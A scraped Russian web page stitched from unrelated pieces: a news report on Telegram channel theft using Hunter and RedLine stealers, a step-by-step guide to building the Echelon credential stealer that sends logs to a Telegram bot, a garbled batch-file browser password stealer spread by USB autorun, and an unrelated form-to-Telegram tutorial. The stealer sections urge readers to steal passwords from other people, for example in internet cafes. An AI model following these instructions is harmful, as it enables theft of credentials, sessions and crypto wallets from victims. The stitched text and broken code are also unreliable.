Как сделать свой стиллер с отправкой в telegram

Обновлено: 19.09.2024

Купить и запустить такие трояны может каждый: их используют для воровства «учеток» игроков в GTA San Andreas Online

В конце января 2021 года в Telegram участились хакерские атаки на владельцев каналов. Мошенники пытаются завладеть учетными записями администраторов, рассылая им зараженные файлы под видом рекламной презентации. Под угрозой «угона» оказался, например, Telegram-канал «База».

Daily Storm удалось найти как минимум четыре Telegram-канала, в случае с которыми злоумышленники достигли своей цели. По словам настоящих владельцев «угнанных» каналов, техподдержка мессенджера не отвечает на их письма.

Как рассказали Daily Storm в компании Group-IB, специализирующейся на предотвращении и расследовании киберпреступлений, мошенники используют вирус, который часто применяется для воровства «учеток» игроков GTA San Andreas Online.

Вторая волна

Январские атаки хакеров — это своего рода вторая волна: первые попытки воровства каналов с помощью «рекламных презентаций» фиксировались в ноябре 2020 года.

Иногда злоумышленники параллельно с забросом рекламного предложения уточняют, является ли их адресат менеджером канала или его администратором. Это делается для того, чтобы не тратить время на человека, не имеющего доступа к «админке», — в таком случае взлом не удастся.

Разработчики вирусов любят использовать формат файла «.scr» из-за того, что оно напоминает слово «скриншот» и вызывает меньше подозрений у пользователя. Если администратор канала откроет его — в считанные минуты потеряет доступ к своему ресурсу. Мошенник удаляет всех админов из канала, меняет контакты и становится его полноправным владельцем.

Подобные рассылки стали массовым явлением в середине января 2021 года.

18 января стало известно о получении мошеннического письма администраторами «Базы». А еще за четыре дня до этого о попытке "угона" написал канал Denis Sexy IT (26,5 тысячи подписчиков) — мошенники безуспешно пытались украсть его ресурс. В конце диалога со злоумышленником администратор уточнил у него, как много каналов удается угнать в сутки.

«Много. А что?» — ответил мошенник.

Подсчитать точное количество украденных каналов затруднительно. Daily Storm достоверно знает как минимум о четырех Telegram-ресурсах, украденных недавно с помощью файлов-троянов.

7 января злоумышленники «угнали» канал «ПроСпартак» (6,5 тысячи подписчиков на момент взлома). Теперь он рекламирует Telegram-бота, имитирующего работу интернет-казино.

18 января мошенники «угнали» два Telegram-канала для геймеров: «Убойный игрок» (76 тысяч подписчиков на момент взлома) и Black Star Gaming (17,6 тысячи подписчиков на момент взлома). По словам основателя каналов, ему не удалось вернуть доступ.

В тот же день, 18 января, админ Telegram-канала trCamera Cloud (25 тысяч подписчиков на момент взлома) Дмитрий открыл зловредный файл и уже через минуту потерял доступ к своему каналу. Ресурс размещал обновления к специальному приложению для улучшения камеры смартфона, чаще всего — моделей Xiaomi.

В разговоре с Daily Storm Дмитрий отметил, что техподдержка Telegram не ответила ему на письма с просьбой о помощи:

«От поддержки реакции — ноль. Подписчики уходят, два года работы ушли вместе с деньгами».

Сейчас канал Дмитрия переименован в «Продажа каналов», а аватарка изменена на изображение фургона с нецензурной надписью, содержащей синоним слова «украли». Настоящий владелец канала вынужденно создал новый ресурс . За два дня он собрал 1,2 тысячи подписчиков. Но до полного восстановления далеко: необходимо еще 24 тысяч фолловеров.

«Пытаюсь нарастить аудиторию с помощью дружественной сетки каналов. Получается, но медленно», — рассказывает Дмитрий.

Он также уточнил, что за взломанный канал злоумышленник просил выкуп в размере 20 тысяч рублей. Все посты к тому моменту были удалены. Дмитрий отказался платить.

«Мне проще рекламу купить», — уточнил он.

Скриншот: © Daily Storm


Скриншот: © Daily Storm

Daily Storm связался с человеком, чьи контакты указаны на канале Дмитрия. Он рассказал, что перепродает украденные каналы с аудиторией за 100 тысяч подписчиков за 40 тысяч рублей и более («зависит от реального охвата»). Сам он — перекупщик. Это второе звено в цепочке людей, зарабатывающих на угонах.

У хакера перекупщик обычно «забирает» подобный канал (со 100 тысячами подписчиков) за 30 тысяч рублей сразу же, как взломщик предоставит доказательства того, что вскрытие прошло успешно.

«Я в этом деле уже давно. Порой самый тупой мамонт может сорваться в последний момент. Как только логи пользователя (владельца канала. — Примеч. Daily Storm) залетают на панель стилера — начинаем сделку».

По словам перекупщика, если бы хакер предложил ему купить украденный канал «Базы» (мошенники минимум дважды пытались его украсть за последние несколько месяцев), то максимальная цена покупки составила бы 400-450 тысяч рублей.

Перекупщики исходят из того, что админка канала может быть восстановлена в течение нескольких дней — если техподдержка Telegram оперативно поможет настоящей администрации ресурса. Когда перекупщик продает украденный канал, он перестает нести за него ответственность. Если техподдержка восстановит «админку», то перекупщик не будет возвращать деньги покупателю.

«Шанс восстановления маленький, но все же он есть. Скупщики берут себе каналы в основном, чтобы посты со ссылками на казино выкладывать, либо «на пассиве» вести канал и бабки получать», — подытоживает собеседник.

Что это за червь такой?

Эксперты компании Group-IB установили тип вредоносной программы, с помощью которой хакеры пытались угнать учетную запись «Базы».

«В атаке использовался довольно примитивный стилер Hunter, который позволяет автоматически собирать учетные записи на зараженном компьютере и отправляет их злоумышленнику. Раньше этот стилер, например, часто использовали для кражи учетных данных у игроков GTA San Andreas Online, рассказывает Daily Storm Илья Померанцев, руководитель группы исследований и разработки CERT-GIB. « Мы проанализировали вредоносный файл, содержащийся в архиве, который злоумышленники прислали Могутину под видом рекламной презентации образовательной платформы. Этот стилер нацелен на устройства под управлением ОС Windows — именно поэтому атакующие так настойчиво просили журналиста открыть архив на рабочем компьютере, а не с iPhone, чего он — и правильно — делать не стал».

В атаках на других владельцев Telegram-каналов (например, канал Дмитрия trCamera Cloud. — Примеч. Daily Storm) злоумышленники отправляли файл «Промо-Видео», внутри которого находился более продвинутый стилер — REDLINE, отметил заместитель руководителя CERT-GIB Ярослав Каргалев. Это семейство «вредоносов» также используется для кражи данных, относящихся к Telegram. А именно — конфигурационных файлов, позволяющих восстановить сессию на другом устройстве. Если у владельца Telegram-канала не включен код-пароль приложения, то злоумышленники смогут восстановить сессию и сменить владельца канала.

Если на компьютере владельца канала произошло заражение, нет смысла устанавливать код-пароль, считают эксперты Group-IB. Вирус может обладать возможностями клавиатурного шпиона. Специалисты компании советуют администратору оперативно завершить активный сеанс на инфицированном компьютере, а с помощью другого устройства (например, смартфона) сменить облачный пароль в настройках конфиденциальности. Затем сменить облачный пароль и установить код-пароль на других доверенных устройствах.

Скриншот: © Daily Storm


Скриншот: © Daily Storm

«Если серьезно, то индустрия вредоносного ПО давно ушла вперед, и у большинства стилеров есть очень удобные билдеры — специально приложение для настройки и задания». конфигурации — с красивым и приятным интерфейсом. Есть подробная видеоинструкция, а некоторые даже имеют свою официальную техподдержку», — уточняет Померанцев.

Эксперты Group-IB считают, что метод атаки, используемый ворами Telegram-каналов, актуален для Windows и Linux. Для IPhone подобный метод не актуален.

«Данные рядового пользователя iOS защищены лучше, чем рядового пользователя Android. Основная причина: невозможность установки софта из стороннего источника. Есть примеры заражения iOS через различные уязвимости, в том числе не в самой iOS, а например в WhatsApp для iOS. Атакуют политиков, журналистов, дипломатов и прочих “нерядовых” граждан. Пример — троян Pegasus от NSO Group. Стоимость таких атак оценивается в десятки миллионов долларов», — объясняет зам руководителя Лаборатории компьютерной криминалистики Group-IB Сергей Никитин.

Первая волна

Сегодня мы рассмотрим, как собрать один из самых удачных, на мой взгляд, стиллеров - Echelon, который обладает возможностью отправки логов в телеграмм или в облако mega.nz.

В первой части мы рассмотрим версию с возможностью отправки логов в вашего бота в Telegram, во второй части с отправкой на mega.nz


Возможности

Кратко пройдусь по основному функционалу:

  • Сбор данных из всевозможных браузеров (логины и пароли, cookie, данные автозаполнения, история, сохраненные банковские карты и т.д.)
  • Сбор файлов сессии Telegram, Outlook, Steam, Discord, криптокошельков и т.д.
  • Файл-граббер, с возможностью выбрать расширения файлов, которые нужно собрать.
  • Сбор информации о компьютере
  • Данные VPN аккаунтов
  • После сбора всех данных стиллер самоудаляется и не оставляет следов
  • Не вылезает никаких окон и т.д.

Настройка и сборка

Для работы на понадобится Visual Studio 2019, скачать вы её можете на официальном сайте. Устанавливаете, при установке выберите данные пункты:


Весит она немало, примерно 20 Гб поэтому на виртуалке у вас должно быть достаточно места.

Скачиваем архив с файлами стиллера и распаковываем. Запускаем Visual Studio (далее VS) и жмем открыть проект или решение


Переходим в папку с распакованными файлами и выбираем Echelon.sln


У вас откроется проект справа, разверните список и нажмите по Program.cs


У вас появится исходный код программы.


Теперь нам нужно создать своего бота в телеге с помощью @BotFather и узнать свой chat ID, например, здесь @chatid_echo_bot. После создания бота вы получите его токен, а также ссылку на него. Вводим токен и свой chat ID в соответствующие строки кода.

Теперь нужно придумать пароль для архивов с логами, которые вы будете получать. Также вы можете расширить список расширений файлов для сбора.

Выставляем конфигурацию Release и собираем всё в одно целое:



После завершения, вам покажут путь, где лежит ваш стиллер


По сути, это всё. Если кто-то хочет, может покопаться в коде программы и других файлах, там всё довольно понятно, тем более автор оставлял ко всему комментарии.

Небольшое замечание от автора

Конечно, такой вид стиллера с отправкой логов в телегу, довольно удобен, однако не очень надежен с точки зрения реверса. Более менее разбирающийся человек сможет реверснуть ваш стиллер и получить токен бота, куда идут логи, а затем просто получить к нему доступ. Фактически другой человек сможет получить доступ ко всем вашим логам в боте.

Метод, который мы будем использовать имеет как плюсы, так и минусы, без этого никуда.

  • Не ругается антивирус;
  • Скорость работы;
  • Простота в доработке;
  • Возможность мгновенного запуска;
  • Портативность.
  • Autorun не работает на Windows 8+;
  • Постоянное созданиеудаление autorun.inf;
  • Личное присутствие;
  • Только для Windows.

Стиллер паролей для браузеров на Windows | Разбор плюсов и минусов

Давайте разберемся, почему такие плюсы и минусы имеет наш стиллер паролей для браузеров.

Думаю первые пару пунктов в разборе не нуждаются, а вот простота в доработке, давайте посмотрим почему.

Ниже будет код программы, там видно, что стиллер крадет пароли из 3 браузеров, Opera, Mozilla, Chrome. Если вы захотите сделать его более объемным и добавить все браузеры, то вам нужно просто найти их директории и прописать пути.

Далее мгновенный запуск. Создаём файл autorun.inf и добавляем наш anyname.bat туда. Как только вы вставите флешку в ПК, произойдёт кража и её можно сразу вытаскивать. Это займет у секунду времени, однако тут сразу и минус. Autorun.inf не запускается на Windows 8+, так что придётся запускать батник вручную. Точнее сказать, автоматический запуск стал невозможен с последнего обновления безопасности Windows 7.

Создаём стиллер паролей для браузеров

Создаём стиллер

Для того, чтобы создать портативный стиллер паролей для браузеров нам понадобится только блокнот.

Создаём текстовый документ и пишем туда следующий код:

d0Google
CD/D %APPDATA%OperaOpera
copy /y wand.dat %

d0Opera
copy /y coockies.dat %

d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y coockies.sqlite %

d0Mozilla
copy /y key3.db %

d0Mozilla
copy /y signons.sqlite %

d0Mozilla
copy /y AppData%MozillaFirefoxProfiles*.def-ault %

Вы же можете его просто скопировать, сохраняем файл как anyname.bat. В коде видно, что сохраняются пароли из Mozilla, Opera, Chrome. Если вы хотите добавить ещё браузеры, требуется найти их директории и таким же образом добавить. Атрибуты, которые мы присвоили делают созданные папки скрытыми, чтобы никто ничего не заподозрил.

Теперь нужно создать файл autorun.inf со следующей командой:

Готово, теперь можете идти куда душа пожелает и воровать пароли, например в интернет-кафе или тому подобные места. Наш стиллер паролей для браузеров не является удалённым, из-за чего придётся ходить.

Сегодня мы поговорили о том, как создать стиллер паролей для браузеров, обсудили плюсы и минусы такого скрипта. Если вам понравилась статья, подписывайтесь на обновления сайта, а также наш Telegram.

Всем - привет. Давно зрела идея разобраться с отправкой данных из формы на сайте в мессенджер Telegram, но руки не доходили, а моментально получать заявки прямо в телефон, ой как хотелось!

Важно: для отправки файла из формы в Телеграм на вашем сервере должен быть включен cURL. Обратитесь к техподдержке вашего хостинга, они подскажут что делать и как включить. У многих он включен по умолчанию. Например, на моем хостинге Beget - так.

Как связать форму на сайте с Telegram

Итак, давайте приступим. Первое что нам нужно, это создать своего бота. Делается это достаточно просто. В поиске наберите @botfather, откройте родительского бота и нажмите "Start":

Как связать форму с Telegram

  • Пишем команду /newbot, для создания нового бота.
  • Придумываем имя бота.
  • Придумываем ник бота.

Создание бота в Телеграм

Если все прошло успешно, то увидите поздравления и токен вашего бота, в моем случае это:

Теперь нужно найти своего бота в поиске, указав его ник и нажать "Start", чтобы активировать его. В моем случае ник @DWS_MESSAGE_bot.

Активация бота в Telegram

После этого нужно создать групповой чат, в который будут приходить заявки и пригласить туда нашего бота. Давайте займемся этим.

Зайдите в меню, нажмите "New Group" и задайте имя вашему чату.

Создание чата для приема заявок

Не забываем пригласить своего бота в чат.

Добавление бота в чат для приема заявок

На данный момент у нас есть бот, мы знаем его токен, есть чат, в который будут приходить заявки, и нам осталось узнать только id чата. Для этого, напишем в чате:

А затем, в браузере введем:

где, XXXXXXXXXXXXXXXXXXXXXXX - токен вашего бота, полученный ранее.

Если все сделали правильно, то перед вами откроется подобная страница:

получение id чата в Телеграм

Разметка формы

Не стал выдумывать что-то сверхсложное, а просто 2 поля и возможность прикрепить файл. Оставил телефон, ведь у многих возникала проблема с символом "+", а файл добавил, так как меня просили разобраться с этой темой.

Добавил стили - получилось так:

Отправка формы в Телеграм

Не забывайте, что форма отправляется без перезагрузки страницы, а значит используется ajax, и, для упрощения, jQuery. Поэтому подключаем сам jQuery, если не подключен, а после, и сам скрипт. Я сделал специальную папку telegramform, которую нужно поместить в корень сайта.

Код с AJAX запросом. Файл - telegramform.js

А теперь сам обработчик нашей формы. Файл - send-message-to-telegram.php:

Во многом он повторяет обработчик из других форм на блоге. Например, в статье "Создание формы обратной связи" используется аналогичный подход, и вы легко сможете осуществить отправку данных как на почту, так и в мессенджер одновременно.


Вот так с файлом:

Отправка файла из формы в Телеграм

Не стал делать каких-то серьезных валидаций, так как это просто пример и вам наверняка нужно будет не только отправка текста или картинки в Телеграм, но и на почту, а значит все равно подстраивать под свои нужды. Если будут вопросы - пишите в комментариях.

Читайте также: